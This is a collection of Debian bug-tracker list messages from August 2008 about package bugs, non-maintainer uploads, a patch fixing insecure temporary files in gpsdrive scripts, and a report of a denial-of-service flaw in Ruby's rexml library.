dc2c4def9b23cdbd610bfb088e7707c0ca439b3c 747266 mt-daapd_0.9~r1696-1.4_amd64.deb Checksums-Sha256: 9dd4d9d75ef46eea098d86676c79e20a31feceb31c36cf9ffaad9fd5adbe384a 1161 mt-daapd_0.9~r1696-1.4.dsc 61be0885353d67d3856ad49d87258d6c1d9bef06ce82b4178d7d6881e1930179 20572 mt-daapd_0.9~r1696-1.4.diff.gz 79f42bb614dac6aa1593fba8e2d03fcb89723386523d68b626158f7f5ae10700 747266 mt-daapd_0.9~r1696-1.4_amd64.deb Files: 5fd1cb8b6b879f5d3f64ac85908c665f 1161 sound optional mt-daapd_0.9~r1696-1.4.dsc 87eaa0bc1ab9d8838533e260cafa03e9 20572 sound optional mt-daapd_0.9~r1696-1.4.diff.gz
Processed: tagging 491655
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.10.35 tags 491655 pending Bug#491655: audacious: log file spammed with tuple_get_int assertion failure message Tags were: patch Tags added: pending End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496799: imp4: cyrus.php file missing
Package: imp4 Version: 4.2-1 Severity: grave Justification: renders package unusable The file /usr/share/horde3/imp/lib/Quota/cyrus.php has been removed from horde3 (checked hord3 CVS website, stating courier.php and cyrus.php have been merged somehow). However some imp functions still use cyrus.php. Symlinking cyrus.php to imap.php within the same directory solves the situation. -- System Information: Debian Release: lenny/sid APT prefers testing APT policy: (500, 'testing') Architecture: i386 (i686) Kernel: Linux 2.6.25-2-686 (SMP w/1 CPU core) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages imp4 depends on: ii horde3 3.2.1+debian0-2 horde web application framework ii php-mail-mime1.5.2-0.1 PHP PEAR module for creating MIME ii php5-imap5.2.6-3 IMAP module for php5 imp4 recommends no packages. Versions of packages imp4 suggests: ii aspell 0.60.6-1 GNU Aspell spell-checker pn imapproxy none (no description available) ii ingo1 1.2-1email filter component for Horde F ii ispell 3.1.20.0-4.4 International Ispell (an interacti ii kronolith2 2.2-1calendar component for Horde Frame ii turba2 2.2.1-1 contact management component for h -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#464281: marked as done (adept: FTBFS: libtool: link: cannot find the library `/usr/lib/libept.la' or unhandled argument `/usr/lib/libept.la')
Your message dated Wed, 27 Aug 2008 16:49:28 +0200 with message-id [EMAIL PROTECTED] and subject line No longer applies. has caused the Debian Bug report #464281, regarding adept: FTBFS: libtool: link: cannot find the library `/usr/lib/libept.la' or unhandled argument `/usr/lib/libept.la' to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 464281: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464281 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: adept version: 2.1.3 Severity: serious User: [EMAIL PROTECTED] Usertags: qa-ftbfs-20080205 qa-ftbfs Justification: FTBFS on i386 Hi, During a rebuild of all packages in sid, your package failed to build on i386. Relevant part: make[4]: Entering directory `/build/user/adept-2.1.3/obj-i486-linux-gnu/adept/installer' g++ -DHAVE_CONFIG_H -I. -I/build/user/adept-2.1.3/./adept/installer -I../.. -I/usr/include/kde -I/usr/share/qt3/include -I. -I/usr/include/tagcoll-2.0.7 -I/usr/include/tagcoll-2.0.7 -I/build/user/adept-2.1.3/./adept/installer/.. -I.. -DQT_THREAD_SUPPORT -D_REENTRANT -Wno-long-long -Wundef -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wconversion -Wchar-subscripts -Wall -W -Wpointer-arith -DNDEBUG -DNO_DEBUG -O2 -g -Wall -O2 -Wformat-security -Wmissing-format-attribute -Wno-non-virtual-dtor -fno-exceptions -fno-check-new -fno-common -fexceptions -DQT_NO_ASCII_CAST -DQT_NO_CAST_ASCII -DINSTALLER_DATA=\/usr/share/app-install\ -c -o main.o /build/user/adept-2.1.3/./adept/installer/main.cpp /build/user/adept-2.1.3/./adept/installer/main.cpp: In function 'int main(int, char**)': /build/user/adept-2.1.3/./adept/installer/main.cpp:16: warning: deprecated conversion from string constant to 'char*' /build/user/adept-2.1.3/./adept/installer/main.cpp:38: warning: unused variable 'args' /usr/share/qt3/bin/moc /build/user/adept-2.1.3/./adept/installer/app.h -o app.moc g++ -DHAVE_CONFIG_H -I. -I/build/user/adept-2.1.3/./adept/installer -I../.. -I/usr/include/kde -I/usr/share/qt3/include -I. -I/usr/include/tagcoll-2.0.7 -I/usr/include/tagcoll-2.0.7 -I/build/user/adept-2.1.3/./adept/installer/.. -I.. -DQT_THREAD_SUPPORT -D_REENTRANT -Wno-long-long -Wundef -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wconversion -Wchar-subscripts -Wall -W -Wpointer-arith -DNDEBUG -DNO_DEBUG -O2 -g -Wall -O2 -Wformat-security -Wmissing-format-attribute -Wno-non-virtual-dtor -fno-exceptions -fno-check-new -fno-common -fexceptions -DQT_NO_ASCII_CAST -DQT_NO_CAST_ASCII -DINSTALLER_DATA=\/usr/share/app-install\ -c -o app.o /build/user/adept-2.1.3/./adept/installer/app.cpp /build/user/adept-2.1.3/./adept/installer/app.cpp:301: warning: unused parameter 'b' /bin/sh ../../libtool --tag=CXX --mode=link g++ -Wno-long-long -Wundef -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wconversion -Wchar-subscripts -Wall -W -Wpointer-arith -DNDEBUG -DNO_DEBUG -O2 -g -Wall -O2 -Wformat-security -Wmissing-format-attribute -Wno-non-virtual-dtor -fno-exceptions -fno-check-new -fno-common -fexceptions -DQT_NO_ASCII_CAST -DQT_NO_CAST_ASCII -DINSTALLER_DATA=\/usr/share/app-install\ -o adept_installer -L/usr/lib/debug main.o app.o ../adept/libadept.la -lapt-front -ltagcoll2 -lz -lwibble -lkio mkdir .libs libtool: link: cannot find the library `/usr/lib/libept.la' or unhandled argument `/usr/lib/libept.la' make[4]: *** [adept_installer] Error 1 make[4]: Leaving directory `/build/user/adept-2.1.3/obj-i486-linux-gnu/adept/installer' make[3]: *** [all-recursive] Error 1 make[3]: Leaving directory `/build/user/adept-2.1.3/obj-i486-linux-gnu/adept' make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/build/user/adept-2.1.3/obj-i486-linux-gnu' make[1]: *** [all] Error 2 make[1]: Leaving directory `/build/user/adept-2.1.3/obj-i486-linux-gnu' make: *** [debian/stamp-makefile-build] Error 2 dpkg-buildpackage: failure: debian/rules build gave error exit status 2 The full build log is available from: http://people.debian.org/~lucas/logs/2008/02/05 A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot containing a sid i386 environment. Internet was not accessible from the build systems. -- | Lucas Nussbaum | [EMAIL PROTECTED] http://www.lucas-nussbaum.net/ | | jabber:
Bug#495154: Processed: RM: tmsnc/testing -- ROM; project discontinued upstream
Hi Miriam, Debian Bug Tracking System wrote: Bug#495154: tmsnc: Package should not go into stable Changed Bug title to `RM: tmsnc/testing -- ROM; project discontinued upstream' from `tmsnc: Package should not go into stable'. based on the bug report, it looks like the release team would prefer removing it (as dead upstream) from unstable as well - testing removals would have been handled by the release team, yet you indicate in the bug that you only want removal from testing. Could you clarify this for me, please? Kind regards T. -- Thomas Viehmann, http://thomas.viehmann.net/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#495968: [gpicview] security RC bugs
Hi, [2] [ 2019485 ] gpicview ask_before_save is ignored with LIBJPEG [3] [ 2019492 ] gpicview ask_before_save is ignored if auto_save_rotated those are no security bugs, there is no way for another user to exploit this. Those are just normal application bugs. Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpURF869mAh0.pgp Description: PGP signature
Processed: No longer applies.
Processing commands for [EMAIL PROTECTED]: fixed 464281 3.0~beta1 Bug#464281: adept: FTBFS: libtool: link: cannot find the library `/usr/lib/libept.la' or unhandled argument `/usr/lib/libept.la' Bug marked as fixed in version 3.0~beta1. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#491655: how about fixing this in a Debian revision / NMU
Hi, Luk Claes wrote: Yes, I think it's worth fixing. as not much seems to have happened in for a week (particularly not on Friday), I'll be aiming at a NMU on Saturday. That should also give the maintainers some breathing-room to consider what else they're planning to do. Kind regards T. -- Thomas Viehmann, http://thomas.viehmann.net/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: The possibility of attack with the help of symlinks in some Debian packages
Processing commands for [EMAIL PROTECTED]: tags 496436 patch confirmed Bug#496436: The possibility of attack with the help of symlinks in some Debian packages Tags were: security Tags added: patch, confirmed thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496436: The possibility of attack with the help of symlinks in some Debian packages
tags 496436 patch confirmed
thanks
Dmitry E. Oboukhov wrote:
Package: gpsdrive-scripts
Severity: grave
Hi, maintainer!
This message about the error concerns a few packages at once. I've
tested all the packages (for Lenny) on my Debian mirror. All scripts
of packages (marked as executable) were tested.
The attached (untested) patch should fix this issue.
Cheers,
Moritz
diff -aur gpsdrive-2.10~pre4.orig/scripts/geo-code gpsdrive-2.10~pre4/scripts/geo-code
--- gpsdrive-2.10~pre4.orig/scripts/geo-code 2007-09-14 23:47:07.0 +0200
+++ gpsdrive-2.10~pre4/scripts/geo-code 2008-08-23 22:35:24.0 +0200
@@ -248,7 +248,7 @@
#
# Main Program
#
-TMP=/tmp/geo$$
+TMP=`mktemp`
STYLE=${TMP}.style
COORDS=${TMP}.coords
OUTWAY=${TMP}.way
@@ -269,7 +269,7 @@
| head -n1 \
`
if [ $URL = ]; then
- cp $COORDS /tmp/geo.google
+ cp -d $COORDS /tmp/geo.google
error Unable to lookup telephone number or name with Google
else
URL=http://maps.yahoo.com/$URL;
@@ -295,7 +295,7 @@
fi
if [ $DEBUG -gt 0 ]; then
-filter=tee /tmp/geo.yahoo
+filter=tee `mktemp`
else
filter=cat
fi
Nur in gpsdrive-2.10~pre4/scripts: geo-code~.
Bug#495154: Processed: RM: tmsnc/testing -- ROM; project discontinued upstream
2008/8/27 Thomas Viehmann [EMAIL PROTECTED]: Hi Miriam, Debian Bug Tracking System wrote: Bug#495154: tmsnc: Package should not go into stable Changed Bug title to `RM: tmsnc/testing -- ROM; project discontinued upstream' from `tmsnc: Package should not go into stable'. based on the bug report, it looks like the release team would prefer removing it (as dead upstream) from unstable as well - testing removals would have been handled by the release team, yet you indicate in the bug that you only want removal from testing. Could you clarify this for me, please? It would be better to remove it both from testing AND unstable. It makes no sense to keep maintaining it in Debian at all. Thanks, Miry -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496803: util-vserver: system hang when shutting down host
Package: util-vserver Version: 0.30.216~r2772-1 Severity: grave Tags: patch Justification: causes non-serious data loss I'm afraid that /etc/init.d/util-vserver stop hangs if there is at least one guest running; it's usually called on host shutdown when it will block the whole system from rebooting/etc until human intervention, and even worse, it's called after ssh and local logins are already disabled, leaving only Ctrl-Alt-SysRQ or reset+hope for no fs damage. Fix: vserver $vserver stop 21 /dev/null should be: vserver $vserver stop 21 /dev/null -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#417142: NMU for websvn
On Wed, Aug 27, 2008 at 04:10:06PM +0200, Thijs Kinkhorst wrote: Hi Pierre, This RC bug has now been open for two weeks. I'm uploading an NMU to the delayed-5 queue according to the attached patch. I hope this helps to keep websvn in good shape in lenny. Hi Thijs, I'm merging your patch and asking for a freeze exception so it can reach lenny in time. Thanks ! Pierre -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#491655: [Pkg-audacious-maintainers] Bug#491655: how about fixing this in a Debian revision / NMU
On Wed, 2008-08-27 at 16:52 +0200, Thomas Viehmann wrote: Hi, Luk Claes wrote: Yes, I think it's worth fixing. as not much seems to have happened in for a week (particularly not on Friday), I'll be aiming at a NMU on Saturday. That should also give the maintainers some breathing-room to consider what else they're planning to do. I am not upload enabled at the moment, please proceed with the NMU. You might take a look at some of the other patches and see if they are worthwhile to include in the NMU too. William signature.asc Description: This is a digitally signed message part
Processed: reopening sympa tmp races
Processing commands for [EMAIL PROTECTED]: reopen 494969 Bug#494969: sympa: Leftover debug code may lead to data loss 'reopen' may be inappropriate when a bug has been closed with a version; you may need to use 'found' to remove fixed versions. Bug#496405: The possibility of attack with the help of symlinks in some Debian packages Bug reopened, originator not changed. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#496410: The possibility of attack with the help of symlinks in some Debian packages
Processing commands for [EMAIL PROTECTED]: severity 496410 important Bug#496410: The possibility of attack with the help of symlinks in some Debian packages Severity set to `important' from `grave' thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496410: The possibility of attack with the help of symlinks in some Debian packages
severity 496410 important thanks On Wed, Aug 27, 2008 at 07:12:29PM +0400, Dmitry E. Oboukhov wrote: _or_ _causes_ _data_ _loss_ It does not cause data loss, the admin needs to execute it. And now stop bitching around. Bastian -- Superior ability breeds superior ambition. -- Spock, Space Seed, stardate 3141.9 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#495154: Processed: RM: tmsnc/testing -- ROM; project discontinued upstream
Processing commands for [EMAIL PROTECTED]: retitle 495154 RM: tmsnc -- ROM; project discontinued upstream Bug#495154: RM: tmsnc/testing -- ROM; project discontinued upstream Changed Bug title to `RM: tmsnc -- ROM; project discontinued upstream' from `RM: tmsnc/testing -- ROM; project discontinued upstream'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#417142: marked as done (depends on non-essential package debconf in postrm)
Your message dated Wed, 27 Aug 2008 15:17:05 + with message-id [EMAIL PROTECTED] and subject line Bug#417142: fixed in websvn 2.0-3 has caused the Debian Bug report #417142, regarding depends on non-essential package debconf in postrm to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 417142: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=417142 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: websvn Version: 1.61-22 Severity: serious Tags: etch-ignore Justification: Policy violation, see section 7.2 hi, while running archive wide piuparts tests your package failed on purge because of debconf beeing unavailable during postrm: Purging configuration files for websvn ... /var/lib/dpkg/info/websvn.postrm: line 6: /usr/share/debconf/confmodule: No such file or directory dpkg: error processing websvn (--purge): subprocess post-removal script returned error exit status 1 Errors were encountered while processing: websvn the full log can be found here: http://people.debian.org/~abi/piuparts/websvn please be sure to use a conditional call to debconf and its commands (this is just an example): -- if [ -f /usr/share/debconf/confmodule ]; then . /usr/share/debconf/confmodule fi db_get ||: -- Please also note: Bugs filed on Packages failing in postrm because of debconf beeing unavailable are not considered RC for etch, so are tagged etch-ignore. bye, - michael ---End Message--- ---BeginMessage--- Source: websvn Source-Version: 2.0-3 We believe that the bug you reported is fixed in the latest version of websvn, which is due to be installed in the Debian FTP archive: websvn_2.0-3.diff.gz to pool/main/w/websvn/websvn_2.0-3.diff.gz websvn_2.0-3.dsc to pool/main/w/websvn/websvn_2.0-3.dsc websvn_2.0-3_all.deb to pool/main/w/websvn/websvn_2.0-3_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Pierre Chifflier [EMAIL PROTECTED] (supplier of updated websvn package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 27 Aug 2008 17:12:24 +0200 Source: websvn Binary: websvn Architecture: source all Version: 2.0-3 Distribution: unstable Urgency: high Maintainer: Pierre Chifflier [EMAIL PROTECTED] Changed-By: Pierre Chifflier [EMAIL PROTECTED] Description: websvn - interface for subversion repositories written in PHP Closes: 417142 Changes: websvn (2.0-3) unstable; urgency=high . * Acknowledge NMU (thanks Thijs Kinkhorst) (Closes: #417142) * Bump standards version to 3.8.0 (no changes) Checksums-Sha1: 11ba75ee70a3de7f11f5320a579b1352cea1e111 963 websvn_2.0-3.dsc 18c14fa4e5bdf271ad64bb27b5055e0e1349a5ae 16737 websvn_2.0-3.diff.gz af6c1f9e9f69f49c6daf90f21230f97b24b44169 191040 websvn_2.0-3_all.deb Checksums-Sha256: 7ea1ed77de71161e2f1544b9e169e29039015e81c356e33b9cd06c0f0d2f32b6 963 websvn_2.0-3.dsc 2db9fd5c25bc84774e55123e191152e4f924c21ef123fdfc9b0f726c82efbcf4 16737 websvn_2.0-3.diff.gz a31bd6d2b1f535bff06a7ec880d878d75b0abfdf0920fbe9608ae0c1542d1d62 191040 websvn_2.0-3_all.deb Files: 5cb7ba45c36151189ac1ad1c95f202bc 963 devel optional websvn_2.0-3.dsc f8b1a4304ed977b01cbd63473433c163 16737 devel optional websvn_2.0-3.diff.gz 5c12b6cf18768e1e779119d2adce49c7 191040 devel optional websvn_2.0-3_all.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFItW70twVrWo1fQMsRAhYrAKCEHn/jam7S3MiGCkYyroAKGhyaXQCdEct2 emoywzQNqrF25HTnv4A5sUc= =UAtG -END PGP SIGNATURE- ---End Message---
Bug#495154: Processed: RM: tmsnc/testing -- ROM; project discontinued upstream
retitle 495154 RM: tmsnc -- ROM; project discontinued upstream thanks Miriam Ruiz wrote: It would be better to remove it both from testing AND unstable. It makes no sense to keep maintaining it in Debian at all. Will do. Thanks for the quick reply! Kind regards T. -- Thomas Viehmann, http://thomas.viehmann.net/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#491655: [Pkg-audacious-maintainers] Bug#491655: how about fixing this in a Debian revision / NMU
William Pitcock wrote: I am not upload enabled at the moment, please proceed with the NMU. You might take a look at some of the other patches and see if they are worthwhile to include in the NMU too. If you can whip up a short MU for sponsoring, we could also go with that. Otherwise, I'd probably focus on the most urgent stuff, so I would appreciate specific suggestions. Kind regards T. -- Thomas Viehmann, http://thomas.viehmann.net/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496807: gnucash: silently removes main files while trying to save without lock
Package: gnucash Version: 2.2.6-1 Severity: grave Justification: causes data loss I was trying to use gnucash over sshfs, to allow several machines to handle the same file. It complained that it was unable to get a lock, and so couldn't prevent simultaneous writes. This was no problem, because there isn't another person working on them. For the rest, everything seemed to work fine. However, when trying to reopen the file, I found that it had not been written, but instead it was deleted. So not only did I lose the work of the session, but it actually deleted my previous work as well. I tried creating a new file, which also complains about the lock file, but seems to work fine otherwise, but it also doesn't create the file. This would have been a critical issue (causes serious data loss), except that gnucash writes loads of log and backup files, so normally most of the work will not actually be lost. As a quick fix, it would be acceptable to turn the lock warning into an error. Thanks, Bas Wijnen signature.asc Description: Digital signature
Bug#491270: bug has been pending for three weeks
Hi, this (RC!) bug has been pending for three weeks now. Unless there are objections, I should think that August is a good month to have a fix uploaded and will see to that if noone else does. Kind regards T. -- Thomas Viehmann, http://thomas.viehmann.net/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#491655: [Pkg-audacious-maintainers] Bug#491655: how about fixing this in a Debian revision / NMU
Hi, On Wed, 2008-08-27 at 17:40 +0200, Thomas Viehmann wrote: William Pitcock wrote: I am not upload enabled at the moment, please proceed with the NMU. You might take a look at some of the other patches and see if they are worthwhile to include in the NMU too. If you can whip up a short MU for sponsoring, we could also go with that. Otherwise, I'd probably focus on the most urgent stuff, so I would appreciate specific suggestions. Alright, I'll publish 1.5.1-4 on mentors sometime before Friday. William signature.asc Description: This is a digitally signed message part
Bug#496808: ruby1.8: DoS vulnerability in rexml parsing module
Package: ruby1.8 Version: 1.8.5-4etch2 Severity: grave Tags: security Justification: user security hole The rexml lib is vulnerable to a DoS attack. Please see http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/. I know there isn't an official patch yet (except the overloading of the REXML module via http://www.ruby-lang.org/security/20080823rexml/rexml-expansion-fix.rb but I expect that to be out soon. -- System Information: Debian Release: 4.0 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-domu Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages ruby1.8 depends on: ii libc6 2.3.6.ds1-13etch7 GNU C Library: Shared libraries ii libruby1.8 1.8.5-4etch2 Libraries necessary to run Ruby 1. ruby1.8 recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496807: gnucash: silently removes main files while trying to save without lock
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 forwarded 496807 http://bugzilla.gnome.org/show_bug.cgi?id=549595 thanks Hi Bas, thank you for your feedback on Gnucash. I have forwarded your report to the upstream bug tracker as http://bugzilla.gnome.org/show_bug.cgi?id=549595 Regards Micha -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFItXzCWN0/4pnhQbQRAiKrAJ9UwCF+zvVF7T2e2WIVlKhG/n5BPACfTC74 GpT7oBeAcLVsN96/1ihqrD8= =A28K -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#496807: gnucash: silently removes main files while trying to save without lock
Processing commands for [EMAIL PROTECTED]: forwarded 496807 http://bugzilla.gnome.org/show_bug.cgi?id=549595 Bug#496807: gnucash: silently removes main files while trying to save without lock Noted your statement that Bug has been forwarded to http://bugzilla.gnome.org/show_bug.cgi?id=549595. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496808: ruby1.8: DoS vulnerability in rexml parsing module
On Wednesday 27 August 2008 17:56, Frank Louwers wrote: The rexml lib is vulnerable to a DoS attack. Please see http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/. This is CVE-2008-3790. Please mention it in the package changelog on uploads. Thijs pgpish8KyIIkh.pgp Description: PGP signature
Bug#493217: libnfsidmap-0.21 is available
Kevin Coffman wrote:
--- libnfsidmap-0.21/libnfsidmap.c~ 2008-08-02 10:52:00.289845221 +1200
+++ libnfsidmap-0.21/libnfsidmap.c 2008-08-02 10:47:50.647889312 +1200
@@ -101,7 +101,7 @@
char plgname[128];
int ret = 0;
- snprintf(plgname, sizeof(plgname), %s%s.so, PLUGIN_PREFIX, method);
+ snprintf(plgname, sizeof(plgname), %s%s.so.0, PLUGIN_PREFIX,
method);
dl = dlopen(plgname, RTLD_NOW | RTLD_LOCAL);
if (dl == NULL) {
Getting back to this. I'm curious if there is a specific reason why
the *.so symlink was not there? Adding the .0 shouldn't be
necessary. But there may be a reason for not including the .so
symlink that I am not aware of.
The reason the version (or a version) number is need is because
some distros only installed the .so with the -devel package which
is not normally installed... The question is how do we get the
version to change automagically when the soname changes?
steved.
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496810: initscript nsca fails when invocked with start and already running
Package: nsca Version: 2.6-3.2 Severity: serious Hi, you should add in README.Debian that dpkg-reconfigure nsca is needed to install startup links (I discovered it by looking at /var/lib/dpkg/info/nsca.postinst..., not something usual users want to do). README.Debian currently says : by default nsca works with an init script /etc/init.d/nsca But it does not say that, by default, symlinks are not installed. [This would be wishlist bug] However, trying to enable nsca, I found a bug: atsina:/etc/init.d# dpkg-reconfigure nsca update-rc.d: warning: /etc/init.d/nsca missing LSB information update-rc.d: see http://wiki.debian.org/LSBInitScripts Starting Nagios Service Check Acceptor: /usr/sbin/nsca already running. ERROR: could not start nsca. invoke-rc.d: initscript nsca, action start failed. atsina:/etc/init.d# Missing LSB headers are already reported. But nsca also fails to return a 0 code when already running: atsina:/etc/init.d# /etc/init.d/nsca start ; echo $? Starting Nagios Service Check Acceptor: /usr/sbin/nsca already running. ERROR: could not start nsca. 1 atsina:/etc/init.d# According to policy 9.3.2 (and recents discussions on debian-devel), starting an already running service or stopping an already stopped service must not return an error code. Best regards, Vincent -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.27-rc3-amd64 (SMP w/2 CPU cores) Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#451791: closed by Julien Cristau [EMAIL PROTECTED] (Bug#451791: fixed in xserver-xorg-video-intel 2:2.3.2-2+lenny3)
[ Brice Goglin ] * Add 02_xaa_by_default_on_i965.diff to switch back to XAA on i965 by default to avoid many rendering problems, closes: #451791. Interestingly, I've never been hit by these rendering problems with EXA, but I don't exactly have a 965G, but a 965GM. But the switch back to XAA seems to apply to any 965... Mike -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#451791: closed by Julien Cristau [EMAIL PROTECTED] (Bug#451791: fixed in xserver-xorg-video-intel 2:2.3.2-2+lenny3)
On Wed, Aug 27, 2008 at 19:25:17 +0200, Mike Hommey wrote: [ Brice Goglin ] * Add 02_xaa_by_default_on_i965.diff to switch back to XAA on i965 by default to avoid many rendering problems, closes: #451791. Interestingly, I've never been hit by these rendering problems with EXA, but I don't exactly have a 965G, but a 965GM. But the switch back to XAA seems to apply to any 965... The rendering problems with EXA were reported by people with pretty much every 965 variant, and we have no known good version. Upstream was never able to reproduce, so at this point this (or forcing ExaNoComposite by default) was the only option left. Cheers, Julien -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#481134: Please hint poppler-data for lenny inclusion
Hideki Yamane wrote: On Sun, 24 Aug 2008 19:45:13 +0200 Luk Claes [EMAIL PROTECTED] wrote: unblocked Great thanks Luk! But, verrry sooorry, I've updated this poppler-data package before read this mail... changelog is below, 1 bug fix and trivial changes. poppler-data (0.2.0-2) unstable; urgency=low * debian/control - add DM-Upload-Allowed: yes, because I'm DM :) - fix poppler-data should suggest libpoppler3 (Closes: #496268) - change Priority: optional from extra, same as cmap-adobe-* - add some descriptions for cmap-adobe-* users so, please unblock this again, please... I am terribly sorry about the inconvenience. unblocked Cheers Luk -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#496818: imagemagick 7:6.4.3.2.dfsg1-1(amd64/experimental): FTBFS: make[1]: *** No rule to make target `j'. Stop
